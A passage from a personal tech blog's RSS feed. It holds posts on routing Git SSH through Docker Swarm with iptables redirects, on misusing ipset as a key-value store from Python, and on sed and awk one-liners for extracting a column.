                    <category><![CDATA[Traefik]]></category>
                    
            <guid isPermaLink="false">188f8571e74ad89ade9fae196d7674db</guid>
            <description>How hard could it be to migrate a Git server to Docker Swarm?</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/containers.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>If you can read this post, the experiment was successful. I managed to migrate my development tools from a cloud virtual machine to an actual physical machine humming behind my back. But let's not rush ahead; let's go back to the beginning.</p>
<p>I have a virtual machine running a couple of development-related tools: a <a href="https://gogs.io/">Gogs</a> Git server, a <a href="https://www.jenkins.io/">Jenkins</a> instance, a <a href="https://hub.docker.com/_/registry">Docker Registry</a>, and a Composer repository (a static HTML site generated by <a href="https://composer.github.io/satis/">Satis</a>). It doesn't get a lot of traffic, and the applications besides Jenkins are pretty lightweight. Jenkins, however, is a bit problematic. For example, it sometimes cannot build Docker images because it runs out of memory.</p>
<p>That's one of the reasons why I started building a small home server (4 CPU cores and 16 GB of memory in a little 20x20x6 cm box) to migrate all the applications to. It runs <a href="https://docs.docker.com/engine/swarm/">Docker Swarm</a> as a single manager node, with <a href="https://traefik.io/traefik/">Traefik</a> for routing and <a href="https://www.portainer.io/solutions/docker">Portainer</a> for managing the Docker stacks. However, initial tests showed that moving the Git server wouldn't be smooth sailing, so I put off the migration until now.</p>
<p>Without the resource constraints, I decided to go with a GitLab installation. It can replace all four applications mentioned before: it operates as a <a href="https://docs.gitlab.com/ee/user/packages/container_registry/">Docker Registry</a>, as multiple <a href="https://docs.gitlab.com/ee/user/packages/package_registry/">Package Registries</a> (and Composer is among them), and Jenkins can be replaced with <a href="https://docs.gitlab.com/ee/ci/">GitLab CI</a>. Maybe my life would be easier this way (nope).</p>
<h3>The problem</h3>
<p>SSH is an old piece of furniture. It lacks fancy accessories like the SNI support of TLS. As a result, there's no easy way to put a proxy or load balancer-like application in front of it that routes incoming connections to different backend applications based on specific criteria (like the target host of the connection). That's a huge problem for us. The host already runs an SSH server on port <code>22</code>, and the Git server running in Docker would also like to run an SSH server on port <code>22</code>. If that port isn't available, it could bind to port <code>2022</code>, for example, but that would transform this:</p>
<pre class="console"><code>$ git clone git@git.example.com:group-name/repository-name.git
</code></pre>
<p>Into this:</p>
<pre class="console"><code>$ git clone ssh://git@git.example.com:2022/group-name/repository-name.git
</code></pre>
<p>Alternatively, we could create a <code>.ssh/config</code> similar to this on every machine we want to clone repositories on:</p>
<pre class="file"><code>.ssh/config
</code></pre>
<pre><code>Host git.example.com
    Port 2022
</code></pre>
<p>Not a big issue, but I didn't want to make this compromise. There are certainly other solutions, like the one in <a href="http://www.ateijelo.com/blog/2016/07/09/share-port-22-between-docker-gogs-ssh-and-local-system">the article</a> that the Gogs Docker image documentation mentions, but that also feels too hacky to me.</p>
<h3>The solution?</h3>
<p>Then I got an idea. I don't know exactly why it came now, since this migration project had been on pause for quite a while. We could assign multiple IP addresses to the machine. The host SSH could listen on one of them and the Git SSH on the other, both on port <code>22</code>.</p>
<pre class="console"><code>$ host example.com
example.com has address 192.168.0.23
$ host git.example.com
git.example.com has address 192.168.0.24
</code></pre>
<p>Such elegance, such beauty. I immediately started working on the implementation. First, I needed a second IP address. On a local network, that's not a big issue, and it can be solved even if the machine doesn't have an extra network adapter. My host machine runs Debian, so I needed to do the following:</p>
<pre class="file"><code>/etc/network/interfaces
</code></pre>
<pre><code>auto enp3s0:0
iface enp3s0:0 inet dhcp

auto enp3s0:1
iface enp3s0:1 inet static
  address 192.168.0.24
  netmask 255.255.255.0
</code></pre>
<p>As you can see, a network adapter can have multiple IP addresses. The first one comes from the good old DHCP server on the router (which hands out a fixed IP address based on the MAC address). The second one is a static address the machine assigns to itself. One little change in the host SSH config, and we are good to go:</p>
<pre class="file"><code>/etc/ssh/sshd_config
</code></pre>
<pre><code>ListenAddress 192.168.0.23
</code></pre>
<p>Now we can switch to the Docker side of things. Although it isn't necessary and doesn't make much sense, I routed the connection through Traefik. This way, it is the one and only entry point into Docker.</p>
<pre class="file"><code>traefik.yaml
</code></pre>
<pre><code>version: &quot;3.2&quot;
services:
  traefik:
    image: traefik:v2.7.0
    command:
      - &quot;--entrypoints.gitssh.address=:22&quot;
    ports:
      - target: 22
        host_ip: 192.168.0.24
        published: 22
        protocol: tcp
        mode: host
    deploy:
      mode: global
</code></pre>
<p>These are just the relevant parts. The complete config looks a lot like <a href="https://github.com/deadlime/swarm-cluster-example/blob/master/ansible/roles/stacks/templates/traefik.yml.j2">what we created in a previous post</a>. Unfortunately, this first attempt failed with an error saying that the <code>host_ip</code> key was not recognized, so I switched to the short format <code>- 192.168.0.24:22:22</code>, and that was good enough for it.</p>
<p>Everything worked. I started a Gogs server to test it, and I could clone a repository and push some data back. Everything was awesome, until I closed my host SSH connection to the server and simply couldn't reconnect. It looked like the Git SSH was listening on the other IP address as well. But that's impossible, right? We had just told each of them to listen on a single IP address.</p>
<p>I had to take a technical break until I found a VGA cable and a spare keyboard to restore a proper SSH connection to the server. By running <code>docker stack deploy</code> manually, I also found out that the IP address binding in my config was being ignored. Portainer didn't share this irrelevant piece of information with me.</p>
<p>After some research, I even found a <a href="https://github.com/moby/moby/issues/26696">Github issue</a> that says that Swarm services can only bind to <code>0.0.0.0</code>.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/this-is-fine.jpg" width="310" height="300" alt="" title="" loading="lazy" />
</p>

<p>It looked like I had to throw my beautiful solution into the trash. Of course, I could run the Git server outside of Swarm, but that's like running it on port <code>2022</code>, and I couldn't allow that.</p>
<h3>The solution!</h3>
<p>After a couple of days, I got another idea. We will listen on port <code>2022</code>. I know it sucks, but let me finish. If we get a connection to address <code>192.168.0.24</code> on port <code>22</code>, we can redirect it to port <code>2022</code>. We only need the following two iptables rules for that:</p>
<pre class="console"><code># iptables -t nat -I PREROUTING 1 -d 192.168.0.24/32 -p tcp -m tcp --dport 22 -j REDIRECT --to-port 2022
# iptables -A INPUT -i enp3s0 -p tcp -m tcp --dport 2022 -j ACCEPT
</code></pre>
<p>A slight drawback is that the Git SSH server is also accessible on port <code>2022</code>, but we can live with this small compromise. There is nothing left to do but install and set up the GitLab server and migrate all the old data and processes into it. That wasn't a walk in the park either, but I may tell that story another time.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Using ipset the wrong way</title>
            <link>https://deadlime.hu/en/2022/03/25/using-ipset-the-wrong-way/</link>
            <pubDate>Fri, 25 Mar 2022 15:27:13 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[ipset]]></category>
                    <category><![CDATA[Python]]></category>
                    
            <guid isPermaLink="false">030de4b2cefc79293d2bc10b756e622e</guid>
            <description>Sometimes you can find a key-value store in the most unexpected places</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/electrical.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>One night, lying on my back and staring sleeplessly at the ceiling, I had strange thoughts. Using <code>ipset</code>, we can store IP addresses (and some other things) that can later be used to simplify our <code>iptables</code> rules.</p>
<p>But what is an IP address, if not 4 bytes of random data? At least for IPv4. So, in theory, we could take a longer text, convert it to IP addresses and store it in <code>ipset</code>, making it a generic key-value store.</p>
<p>What real-world application would this have? Most probably nothing, but the idea sounded interesting enough to investigate some more. Maybe I can learn a thing or two from it.</p>
<h3>Text to IP address</h3>
<p>Let's start at the beginning. We have some good-looking text, and we want to transform it into IPv4 addresses.</p>
<pre><code>'notebook'
</code></pre>
<p>First, we need to split it into 4-byte chunks because that's what we can store in an IP address.</p>
<pre><code>['note', 'book']
</code></pre>
<p>Then we convert every character into a number.</p>
<pre><code>[[110, 111, 116, 101], [98, 111, 111, 107]]
</code></pre>
<p>Finally, we join them together with dots to get the IP addresses.</p>
<pre><code>['110.111.116.101', '98.111.111.107']
</code></pre>
<p>Funny little fact: the <code>note</code> belongs to a Chinese telecommunications company, and the <code>book</code> belongs to Verizon.</p>
<p>If the length of the text is not divisible by four (who would be so evil as to write text like that?), we pad the missing bytes with zeros. We then have to cut these off when we convert the addresses back to text.</p>
<pre><code>'pencil'
    =&gt; [112, 101, 110, 99, 105, 108]
        =&gt; ['112.101.110.99', '105.108.0.0']
</code></pre>
<h3>Storing the IP addresses</h3>
<p>Naturally, we will use ipset for that, but we can already suspect that we will have some complications by looking at the name. It's a set, so an IP address can be in it only once (we cannot store the <code>gomugomu</code> text), and the order of the members isn't guaranteed (perhaps we get back <code>booknote</code> instead of <code>notebook</code>).</p>
<p>By default, we can store 65536 IP addresses in an <code>ipset</code>, so we could use the first two bytes of an address (that's exactly 65536 different values) as a serial number, and the other two bytes will be the data. It solves both problems of sequence and uniqueness, but we halve the available storage.</p>
<p>Luckily, <code>ipset</code> can store other things besides IP addresses, for example IP address and port pairs. And there are 65536 different ports. What a pleasant surprise. So, we can use the port as a serial number, and the address can be used entirely for data.</p>
<p>In practice, this is what storing the <code>notebook</code> value under the <code>drawer</code> key would look like:</p>
<pre class="console"><code># ipset create drawer hash:ip,port
# ipset add drawer 110.111.116.101,0
# ipset add drawer 98.111.111.107,1
# ipset list drawer
Name: drawer
Type: hash:ip,port
Revision: 5
Header: family inet hashsize 1024 maxelem 65536
Size in memory: 216
References: 0
Number of entries: 2
Members:
98.111.111.107,tcp:1
110.111.116.101,tcp:0
</code></pre>
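<p>Building the members and reading them back in order is straightforward. Here is a Python sketch. The function names are hypothetical, and the parsing assumes the <code>address,tcp:port</code> member format shown in the <code>ipset list</code> output above. Since the port is the serial number, a value can have at most 65536 chunks.</p>
<pre><code class="hljs python">def to_members(addresses):
    """Turn IP addresses into `ip,port` members, using the position as the port."""
    return [f"{address},{port}" for port, address in enumerate(addresses)]


def from_members(lines):
    """Restore the original order from member lines like '98.111.111.107,tcp:1'."""
    pairs = []
    for line in lines:
        address, port = line.strip().rsplit(",", 1)
        pairs.append((int(port.split(":")[-1]), address))  # 'tcp:1' or just '1'
    return [address for _, address in sorted(pairs)]


print(to_members(["110.111.116.101", "98.111.111.107"]))
# ['110.111.116.101,0', '98.111.111.107,1']
print(from_members(["98.111.111.107,tcp:1", "110.111.116.101,tcp:0"]))
# ['110.111.116.101', '98.111.111.107']

# 'gomugomu' is the same address twice, but the ports keep the members distinct
print(len(set(to_members(["103.111.109.117", "103.111.109.117"]))))  # 2
</code></pre>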
<h3>Let's see some code</h3>
<p>Converting back and forth won't be a big surprise. We already discussed the method earlier.</p>
<pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">text_to_ip</span><span class="hljs-params">(text: str)</span> -&gt; List[str]:</span>
    parts = [str(c) <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> text.encode()]
    remainder = len(parts) % <span class="hljs-number">4</span>
    <span class="hljs-keyword">if</span> remainder &gt; <span class="hljs-number">0</span>:
        parts += [<span class="hljs-string">'0'</span>] * (<span class="hljs-number">4</span> - remainder)

    addresses = []
    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">0</span>, len(parts), <span class="hljs-number">4</span>):
        addresses.append(<span class="hljs-string">'.'</span>.join(parts[i:i + <span class="hljs-number">4</span>]))

    <span class="hljs-keyword">return</span> addresses
</code></pre>
<p>We encode the text into bytes and turn each byte into its decimal string form, so the <code>join</code> will work later. Next, we pad the list with zeros so its length is divisible by four. Finally, we turn each group of four into an IP address.</p>
<pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">ip_to_text</span><span class="hljs-params">(addresses: List[str])</span> -&gt; str:</span>
    data = bytearray()
    <span class="hljs-keyword">for</span> addr <span class="hljs-keyword">in</span> addresses:
        <span class="hljs-comment"># each part of the address is one byte of the UTF-8 encoded text</span>
        data += bytes(int(c) <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> addr.split(<span class="hljs-string">'.'</span>))

    <span class="hljs-comment"># cut off the zero padding, then decode the bytes back to text</span>
    <span class="hljs-keyword">return</span> data.rstrip(<span class="hljs-string">b'\x00'</span>).decode()
</code></pre>
<p>Converting it back to text is even easier. We turn every part of each IP address back into a byte, join them into one long byte string, cut off the zeros from the end, and decode the result. Decoding the bytes as a whole (instead of calling <code>chr()</code> on each byte) keeps multi-byte UTF-8 characters, like accented letters, intact.</p>
<p>Storing the addresses could be a bit challenging. Of course, we could use the <code>subprocess</code> module to call the <code>ipset</code> command hundreds of times to save a single value, but it does not feel that elegant, let alone efficient.</p>
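<p>If we stick with the command-line tool, one possible middle ground is <code>ipset restore</code>, which reads a whole batch of commands (one per line, without the leading <code>ipset</code>) from the standard input, so storing a value takes a single process. A minimal sketch, assuming root privileges and the <code>hash:ip,port</code> set type used above; the function names are hypothetical, and I haven't measured how it compares to other approaches.</p>
<pre><code class="hljs python">import subprocess


def build_restore_script(key, addresses):
    # one ipset command per line, without the leading "ipset"
    lines = [f'create {key} hash:ip,port', f'flush {key}']
    for i, ip in enumerate(addresses):
        # the port number keeps the order of the addresses
        lines.append(f'add {key} {ip},{i}')
    return '\n'.join(lines) + '\n'


def store_with_restore(key, addresses):
    # -exist: don't fail if the set already exists
    subprocess.run(
        ['ipset', '-exist', 'restore'],
        input=build_restore_script(key, addresses),
        text=True,
        check=True,
    )
</code></pre>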
<p>We could use <a href="https://ipset.netfilter.org/libipset.man.html">libipset</a> shipped with <code>ipset</code> and the <code>ctypes</code> module of Python. It's a bit more complicated, but it's also ten times faster than using <code>subprocess</code> in this case.</p>
<p>First, we will need something to talk to the <code>libipset</code> library.</p>
<pre><code class="hljs python"><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> cdll, c_int, POINTER, c_char_p, CFUNCTYPE, c_void_p
<span class="hljs-keyword">from</span> typing <span class="hljs-keyword">import</span> List


<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">IpSet</span>:</span>
    __output = <span class="hljs-string">b''</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self)</span>:</span>
        self.__library = cdll.LoadLibrary(<span class="hljs-string">'libipset.so.13'</span>)
        self.__library.ipset_load_types()
        self.__library.ipset_init.restype = POINTER(c_int)
        self.__ipset = self.__library.ipset_init()
        self.__library.ipset_custom_printf(
            self.__ipset,
            <span class="hljs-literal">None</span>, <span class="hljs-literal">None</span>, self.__ipset_print_outfn,
            <span class="hljs-literal">None</span>
        )

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__del__</span><span class="hljs-params">(self)</span>:</span>
        self.__library.ipset_fini(self.__ipset)

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run</span><span class="hljs-params">(self, command: List[str])</span>:</span>
        IpSet.__output = <span class="hljs-string">b''</span>
        command = [<span class="hljs-string">'ipset'</span>] + command

        self.__library.ipset_parse_argv(
            self.__ipset,
            len(command),
            (c_char_p * len(command))(*[
                c_char_p(arg.encode()) <span class="hljs-keyword">for</span> arg <span class="hljs-keyword">in</span> command
            ])
        )

        <span class="hljs-keyword">return</span> IpSet.__output

<span class="hljs-meta">    @staticmethod</span>
<span class="hljs-meta">    @CFUNCTYPE(c_int, POINTER(c_int), c_void_p, c_char_p, c_char_p)</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__ipset_print_outfn</span><span class="hljs-params">(session, p, fmt, outbuf)</span>:</span>
        IpSet.__output += outbuf
        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>
</code></pre>
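<p>We need to load the library and call a few of its functions to initialize it properly. We also have to juggle C types, which adds &quot;a bit&quot; of extra code, but in the end, we successfully run the command. Its output doesn't go to the standard output: <code>libipset</code> hands it to the <code>__ipset_print_outfn</code> callback we registered with <code>ipset_custom_printf</code>, which collects it in <code>IpSet.__output</code>.</p>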
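<p>The least obvious part is probably the callback. To see the same <code>CFUNCTYPE</code> mechanism in isolation, here is a small sketch that passes a Python function to the C standard library's <code>qsort</code> instead of <code>libipset</code>. It assumes a Linux or macOS system, where <code>CDLL(None)</code> exposes the symbols already loaded into the Python process, libc included; <code>c_sort</code> is a hypothetical helper.</p>
<pre><code class="hljs python">from ctypes import CDLL, CFUNCTYPE, POINTER, c_int, c_size_t, sizeof

# symbols already loaded into the process, including libc
libc = CDLL(None)
libc.qsort.restype = None  # qsort returns void

# int (*compar)(const void *, const void *), typed as int pointers here
CMPFUNC = CFUNCTYPE(c_int, POINTER(c_int), POINTER(c_int))


@CMPFUNC
def compare(a, b):
    # called from C code; a and b point into the C array being sorted
    return a[0] - b[0]


def c_sort(values):
    array = (c_int * len(values))(*values)
    # compare is a module-level object, so it stays alive during the call
    libc.qsort(array, c_size_t(len(array)), c_size_t(sizeof(c_int)), compare)
    return list(array)


print(c_sort([5, 1, 4, 2, 3]))  # [1, 2, 3, 4, 5]
</code></pre>
<p>Just like <code>__ipset_print_outfn</code>, the decorated function has to match the C signature exactly, otherwise segmentation faults are the likely result.</p>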
<p>It wasn't an easy ride to come up with that class. It took a considerable amount of time, and I had to go through the <a href="https://docs.python.org/3/library/ctypes.html">documentation of ctypes</a>, the relevant parts of the <a href="https://git.netfilter.org/ipset/tree/">source code of ipset</a>, and of course, Google also helped a lot. In the end, I managed to glue all the pieces together without constantly getting segmentation faults. It works, but (considering my slight incompetence in this area) it might not be the perfect solution.</p>
<p>From this point on, writing the client for our new key-value store is a smooth ride.</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> re


<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">IpSetKeyValueStore</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, ipset: IpSet)</span>:</span>
        self.__ipset = ipset
        self.__ip_pattern = re.compile(<span class="hljs-string">r'(\d+\.\d+\.\d+\.\d+),.*:(\d+)'</span>)

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__del__</span><span class="hljs-params">(self)</span>:</span>
        <span class="hljs-keyword">del</span> self.__ipset

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get</span><span class="hljs-params">(self, key: str)</span> -&gt; str:</span>
        result = self.__ipset.run([<span class="hljs-string">'list'</span>, <span class="hljs-string">'-output'</span>, <span class="hljs-string">'save'</span>, key])
        data = self.__ip_pattern.findall(result.decode(<span class="hljs-string">'utf-8'</span>))

        addresses = [ip <span class="hljs-keyword">for</span> ip, _ <span class="hljs-keyword">in</span> sorted(data, key=<span class="hljs-keyword">lambda</span> x: int(x[<span class="hljs-number">1</span>]))]
        <span class="hljs-keyword">return</span> ip_to_text(addresses)

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">set</span><span class="hljs-params">(self, key: str, value: str)</span> -&gt; <span class="hljs-keyword">None</span>:</span>
        self.__ipset.run([<span class="hljs-string">'create'</span>, <span class="hljs-string">'-exist'</span>, key, <span class="hljs-string">'hash:ip,port'</span>])
        self.__ipset.run([<span class="hljs-string">'flush'</span>, key])

        <span class="hljs-keyword">for</span> i, ip <span class="hljs-keyword">in</span> enumerate(text_to_ip(value)):
            <span class="hljs-comment"># the port number stores the position of the address</span>
            self.__ipset.run([<span class="hljs-string">'add'</span>, key, <span class="hljs-string">f'<span class="hljs-subst">{ip}</span>,<span class="hljs-subst">{i}</span>'</span>])

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">delete</span><span class="hljs-params">(self, key: str)</span> -&gt; <span class="hljs-keyword">None</span>:</span>
        self.__ipset.run([<span class="hljs-string">'destroy'</span>, key])
</code></pre>
<p>There are many ways to improve and extend this further. For example, <code>ipset</code> supports timeouts, so expiring keys can be easily added, or the storage capacity can be significantly increased using IPv6 addresses. I leave these as an exercise for the reader.</p>
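<p>As a starting point for the IPv6 variant, here is a minimal sketch of the conversion using Python's <code>ipaddress</code> module: each IPv6 address holds 16 bytes of text instead of 4. The function names are hypothetical, and the set itself would presumably have to be created with <code>family inet6</code>.</p>
<pre><code class="hljs python">import ipaddress


def text_to_ipv6(text):
    data = text.encode()
    # pad with zero bytes until the length is divisible by 16
    data += b'\x00' * (-len(data) % 16)
    return [
        str(ipaddress.IPv6Address(data[i:i + 16]))
        for i in range(0, len(data), 16)
    ]


def ipv6_to_text(addresses):
    # .packed turns each address back into its 16 bytes
    data = b''.join(ipaddress.IPv6Address(a).packed for a in addresses)
    return data.rstrip(b'\x00').decode()


print(text_to_ipv6('notebook'))  # ['6e6f:7465:626f:6f6b::']
</code></pre>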
<p>It is also worth mentioning that we could add a comment when we store an IP address, making it so much easier to store any data in the ipset. But where's the fun in that?</p>

]]></content:encoded>
        </item>
            <item>
            <title>Variations for a theme</title>
            <link>https://deadlime.hu/en/2022/02/17/variations-for-a-theme/</link>
            <pubDate>Thu, 17 Feb 2022 07:38:10 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[AWK]]></category>
                    <category><![CDATA[command line]]></category>
                    <category><![CDATA[sed]]></category>
                    
            <guid isPermaLink="false">04daa91e33bacc8ea5f33ade53e994a9</guid>
            <description>The Linux shell is a swiss army knife made out of swiss army knives</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/cake_pops.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Sometimes you start following a thought and end up in unexpected places: you not only find out how deep the rabbit hole goes, you even start digging extra tunnels.</p>
<p>A similar thing happened to me when I was faced with the following problem: you have a file containing values separated by tab characters, and the first row contains the names of the columns. Something like this:</p>
<pre><code>id  name  status  date  type
1 n1  s1  d1  t1
2 n2  s2  d2  t2
3 n3  s3  d3  t3
</code></pre>
<p>You need to get the values from the first column, separated by spaces. For this example, the result would be <code>1 2 3</code>. To ramp up the difficulty, we want to solve this on the command line without writing a script. There was already a solution for it:</p>
<pre class="console"><code>cat file.tsv | awk '(NR&gt;1) { print $1 }'  |  tr '\n'  ' '
</code></pre>
<p>Although I'm also a big awk fan myself, this wasn't the first solution that came to my mind. But there is nothing wrong with that. In fact, this started me on the journey to find more alternative solutions.</p>
<h3>Dissecting the problem</h3>
<p>First, we should examine the task a little bit more. It can be divided into three parts:</p>
<ol>
<li>get rid of the first row</li>
<li>get the first column from every row</li>
<li>transform the rows into a single row (where the values are separated with spaces)</li>
</ol>
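<p>For comparison, the same three steps could be sketched in Python (even though the goal here is to stay on the command line). This assumes the file is valid tab-separated text; <code>first_column</code> is a hypothetical name.</p>
<pre><code class="hljs python">import csv
import io


def first_column(tsv_text):
    rows = csv.reader(io.StringIO(tsv_text), delimiter='\t')
    next(rows, None)  # 1. get rid of the first row
    values = [row[0] for row in rows if row]  # 2. keep the first column
    return ' '.join(values)  # 3. join the values with spaces


print(first_column('id\tname\n1\tn1\n2\tn2\n3\tn3\n'))  # 1 2 3
</code></pre>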
<p>Now that we have a couple of smaller tasks, we can look for solutions for each one of them separately.</p>
<h3>Getting rid of the first row</h3>
<pre class="console"><code>awk '(NR&gt;1) { print }'
</code></pre>
<p>A somewhat forced example based on the original solution. If we've come this far with <code>awk</code>, we could go even further, but we will come back to this a little later.</p>
<pre class="console"><code>sed 1d
</code></pre>
<p>I found this one while digging, and it looks like a pretty elegant solution. It deletes the first line and outputs everything else unchanged.</p>
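<pre class="console"><code>tail -n +2
</code></pre>
<p>The more well-known <code>tail -n 1</code> (or the shorter <code>tail -1</code>) prints only the last row. With a plus sign, the number tells <code>tail</code> where to start instead, so <code>tail -n +2</code> returns everything from the second row until the end. The <code>tail +2</code> form is an older shorthand; <code>-n +2</code> is the form POSIX specifies.</p>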
<h3>Keeping only the first column</h3>
<pre class="console"><code>awk '{ print $1 }'
</code></pre>
<p>A classic <code>awk</code> solution. Not much to say about it.</p>
<pre class="console"><code>cut -f1
</code></pre>
<p>My personal favorite. It's a bit dumber than <code>awk</code> (for example, two separator characters next to each other mean an empty field between them, not a single separator), but it's still useful in many cases.</p>
<pre class="console"><code>sed 's/^\([^\t]\+\).*/\1/'
</code></pre>
<p>You can solve anything with <code>sed</code>. But why would you? It helps a lot that we need the first column, since the pattern can be anchored to the start of the line. It would also help if we knew that the <code>id</code> is always numeric.</p>
<h3>Making one single row</h3>
<pre class="console"><code>paste -s -d' ' -
</code></pre>
<p>The right tool for this job. It's an excellent choice.</p>
<pre class="console"><code>sed -n 'H;${g;y/\n/ /;p}'
</code></pre>
<p>Not as friendly as the previous one, and it generates an extra space character at the start of the line. We will go into much more detail later about what this line really means.</p>
<pre class="console"><code>tr '\n'  ' '
</code></pre>
<p>This works nicely. The only drawback is that it replaces the last newline, so we end up with an extra space at the end of the line.</p>
<pre class="console"><code>xargs
</code></pre>
<p>It's an odd choice. The <code>xargs</code> command turns the rows of its input into arguments and passes them to another command. The default command happens to be <code>echo</code>, so it does exactly what we want. However, it doesn't work if we need to separate the values with anything other than spaces.</p>
<h3>Complex solutions</h3>
<p>Combining the pieces above, we already have 3 × 3 × 4 = 36 different solutions, but you wouldn't write something like <code>awk '(NR&gt;1) { print }' | awk '{ print $1 }'</code>. Sometimes a tool can solve multiple subtasks at once:</p>
<pre class="console"><code>awk '(NR&gt;1) { print $1 }'
</code></pre>
<pre class="console"><code>sed -n '1!s/^\([^\t]\+\).*/\1/p'
</code></pre>
<pre class="console"><code>perl -F'\t' -e 'print &quot;$F[0] &quot; if $i &gt; 0; $i++'
</code></pre>
<p>Can we find a tool that can solve the whole problem? There should be a simple <code>sed</code> command that does what we want, right? Digging just got real. I dove deep into the <a href="https://www.gnu.org/software/sed/manual/sed.html"><code>sed</code> documentation</a> for answers and was horrified by the things this tool can do. It's like the love child of <code>awk</code> and <code>vi</code>. But my efforts weren't in vain. At long last, I emerged from the depths with a command:</p>
<pre class="console"><code>sed -n '1!{s/^\([^\t]\+\).*/\1/;H};${g;y/\n/ /;s/^ //;p}'
</code></pre>
<p>It's trivial, right? It should have been the first thing I thought of. I don't want to drag anyone down into the abyss we know as <code>sed</code>, but this command could use some explanation.</p>
<h3><code>sed</code> basics</h3>
<p><code>sed</code> works with commands. Every command has the <code>&lt;filter&gt;&lt;command&gt;&lt;parameter&gt;</code> format (the <code>sed</code> manual calls the filter an address), and it runs on every row of the input where the filter matches (it feels a lot like <code>awk</code> in this regard). We can give more than one command by separating them with semicolons, and a filter can also apply to multiple commands if we put them between <code>{</code> and <code>}</code>.</p>
<p>One more thing worth mentioning is the &quot;pattern space&quot;. Initially, it contains the current row, and the commands can write their output back into it. There is also something called the &quot;hold space&quot;: we can save the content of the pattern space into the hold space and load it back later.</p>
<h3>The details of the solution</h3>
<p>There is nothing left to do but dissect the original command:</p>
<pre class="console"><code>sed -n '1!{s/^\([^\t]\+\).*/\1/;H};${g;y/\n/ /;s/^ //;p}'
</code></pre>
<p>The <code>-n</code> flag tells <code>sed</code> not to print anything by default. The rest can be split into two parts: a <code>1!{...}</code> and a <code>${...}</code> filter block. The first one runs on every row except the first one, and the second one runs only on the last row.</p>
<p>The first filter block runs two commands: an <code>s</code> and an <code>H</code>. The <code>s</code> replaces the whole row with the value of its first column, and the <code>H</code> appends a newline and the current content of the pattern space to the hold space.</p>
<p>The second filter block runs four commands: a <code>g</code>, a <code>y</code>, an <code>s</code>, and finally a <code>p</code>. The <code>g</code> copies the content of the hold space (the values of the first column, each preceded by a newline) into the pattern space, the <code>y</code> replaces the newlines with spaces, the <code>s</code> removes the extra space from the start of the value, and the <code>p</code> prints the result. And we are finally done.</p>
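<p>To make the two buffers easier to picture, here is a rough Python model of what the command does with the pattern space and the hold space. It is only an approximation for illustration (real <code>sed</code> has many more rules), and <code>sed_model</code> is a hypothetical name.</p>
<pre><code class="hljs python">import re


def sed_model(lines):
    # rough model of: sed -n '1!{s/^\([^\t]\+\).*/\1/;H};${g;y/\n/ /;s/^ //;p}'
    hold = ''  # the hold space starts out empty
    output = []  # -n: nothing is printed unless p says so
    for number, line in enumerate(lines, start=1):
        pattern = line  # the pattern space holds the current row
        if number != 1:  # 1!{...}
            pattern = re.sub(r'^([^\t]+).*', r'\1', pattern)  # s: keep the first column
            hold += '\n' + pattern  # H: append a newline and the pattern space
        if number == len(lines):  # ${...}
            pattern = hold  # g: copy the hold space into the pattern space
            pattern = pattern.replace('\n', ' ')  # y/\n/ /
            pattern = re.sub(r'^ ', '', pattern)  # s/^ //
            output.append(pattern)  # p
    return output


print(sed_model(['id\tname', '1\tn1', '2\tn2', '3\tn3']))  # ['1 2 3']
</code></pre>
<p>The leading space removed by <code>s/^ //</code> comes from the very first <code>H</code>, which appends a newline even though the hold space is still empty.</p>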
<p>Interestingly enough, if we try to solve the whole problem with another tool (like <code>awk</code> or a Perl one-liner), we end up with more or less the same structure. Maybe that's because these tools process the input row by row, so we need somewhere to hold the partial result.</p>
<p>This marks the end of our little journey into <code>sed</code>-land. Lessons learned? Using the proper tool for each subtask is more effective than solving the whole problem with one generic tool. Happy text processing!</p>

]]></content:encoded>
        </item>
            <item>
            <title>This could also work</title>
            <link>https://deadlime.hu/en/2021/10/16/this-could-also-work/</link>
            <pubDate>Fri, 15 Oct 2021 22:25:38 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Python]]></category>
                    <category><![CDATA[Sublime]]></category>
                    
            <guid isPermaLink="false">8d017928ef1836a99c58b5c0c113dda5</guid>
            <description>Sometimes the eval is not that evil</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/archive.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

